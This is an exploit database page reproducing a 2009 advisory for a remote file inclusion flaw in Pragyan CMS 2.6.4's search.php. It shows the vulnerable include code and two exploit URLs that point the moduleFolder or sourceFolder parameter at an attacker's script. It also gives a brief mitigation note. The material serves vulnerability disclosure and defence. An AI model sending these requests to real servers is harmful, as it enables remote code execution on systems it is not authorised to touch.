header-logo
Suggest Exploit
vendor:
Pragyan CMS
by:
Mr.SeCreT
9.3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Pragyan CMS
Affected Version From: 2.6.2004
Affected Version To: 2.6.2004
Patch Exists: No
Related CWE: N/A
CPE: a:pragyan:pragyan:2.6.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Pragyan CMS 2.6.4 (Search.php) Remote File Inclusion Vulnerability

Pragyan CMS 2.6.4 is vulnerable to a Remote File Inclusion vulnerability due to a lack of sanitization of user-supplied input. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application, which can allow the attacker to execute arbitrary code on the server.

Mitigation:

Input validation should be used to prevent the inclusion of maliciously crafted files. Additionally, the application should be configured to use the most restrictive file permissions possible.
Source

Exploit-DB raw data:

###################### Author: #############################
Author: Mr.SeCreT
E-mail: g-ff@hotmail.com<mailto:g-ff@hotmail.com>
From: Syria
Greeting To: Milw0rm
############## Script Information: #########################
Scipt: Pragyan CMS 2.6.4 (Search.php) Remote File Inclusion Vulnerability
Language: PHP
Download: http://garr.dl.sourceforge.net/project/pragyan/pragyan/2.6.4/pragyan-2.6.4.tar.gz
register_globals = On

################### Vul Code: ##############################
$searchModuleFolder = "$sourceFolder/$moduleFolder/search";
$include_dir = "$searchModuleFolder/include";
include ("$include_dir/commonfuncs.php");

################### Exploit: ###############################
www.site.com/path/cms/modules/search/search.php?moduleFolder=[Evil<http://www.site.com/path/cms/modules/search/search.php?moduleFolder=[Evil> Script]
www.site.com/path/cms/modules/search/search.php?sourceFolder=[Evil<http://www.site.com/path/cms/modules/search/search.php?sourceFolder=[Evil> Script]

############################################################
The End

Navigation

Suggest Exploit

Services By CQR